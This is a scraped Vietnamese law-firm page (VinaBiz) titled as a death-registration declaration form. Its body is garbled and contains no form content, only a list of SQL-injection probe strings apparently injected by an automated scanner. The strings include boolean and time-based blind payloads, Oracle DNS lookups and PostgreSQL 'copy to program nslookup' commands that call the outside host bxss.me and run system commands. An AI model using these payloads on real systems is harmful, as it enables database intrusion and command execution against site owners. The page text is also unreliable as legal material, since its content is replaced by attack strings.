Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai đăng kí khai tử

Cập nhật lần cuối lúc 15:11 ngày 15/07/2013

Nguồn: Công ty Luật Vinabiz/ Nguoiduatin.vn
1
1
1
1
-1 OR 2+863-863-1=0+0+0+1 --
-1 OR 3+863-863-1=0+0+0+1 --
-1 OR 3*2<(0+5+863-863) --
-1 OR 3*2>(0+5+863-863) --
-1 OR 2+765-765-1=0+0+0+1
1'"
\
-1 OR 3+765-765-1=0+0+0+1
1
-1 OR 3*2<(0+5+765-765)
@@li5Ve
-1 OR 3*2>(0+5+765-765)
JyI=
-1' OR 2+380-380-1=0+0+0+1 --
-1' OR 3+380-380-1=0+0+0+1 --
-1' OR 3*2<(0+5+380-380) --
-1' OR 3*2>(0+5+380-380) --
-1' OR 2+968-968-1=0+0+0+1 or 'WZW9N6Uk'='
-1' OR 3+968-968-1=0+0+0+1 or 'WZW9N6Uk'='
-1' OR 3*2<(0+5+968-968) or 'WZW9N6Uk'='
-1' OR 3*2>(0+5+968-968) or 'WZW9N6Uk'='
-1" OR 2+27-27-1=0+0+0+1 --
-1" OR 3+27-27-1=0+0+0+1 --
-1" OR 3*2<(0+5+27-27) --
-1" OR 3*2>(0+5+27-27) --
if(now()=sysdate(),sleep(10.078),0)/*'XOR(if(now()=sysdate(),sleep(10.078),0))OR'"XOR(if(now()=sysdate(),sleep(10.078),0))OR"*/
(select(0)from(select(sleep(10.078)))v)/*'+(select(0)from(select(sleep(10.078)))v)+'"+(select(0)from(select(sleep(10.078)))v)+"*/
-1; waitfor delay '0:0:10.078' --
-1); waitfor delay '0:0:20.156' --
1 waitfor delay '0:0:20.156' --
ylbnw4N4'; waitfor delay '0:0:30.233999999999998' --
-1;select pg_sleep(30.233999999999998); --
-1);select pg_sleep(30.233999999999998); --
-1));select pg_sleep(30.233999999999998); --
3iLPdeSK';select pg_sleep(10.078); --
zSviJNSL');select pg_sleep(10.078); --
4KFoLHOk'));select pg_sleep(10.078); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6055.34060.5fe07.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6056.34060.5fe07.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6057.34060.5fe07.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6059.34060.5fe07.\1.bxss.me
188'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: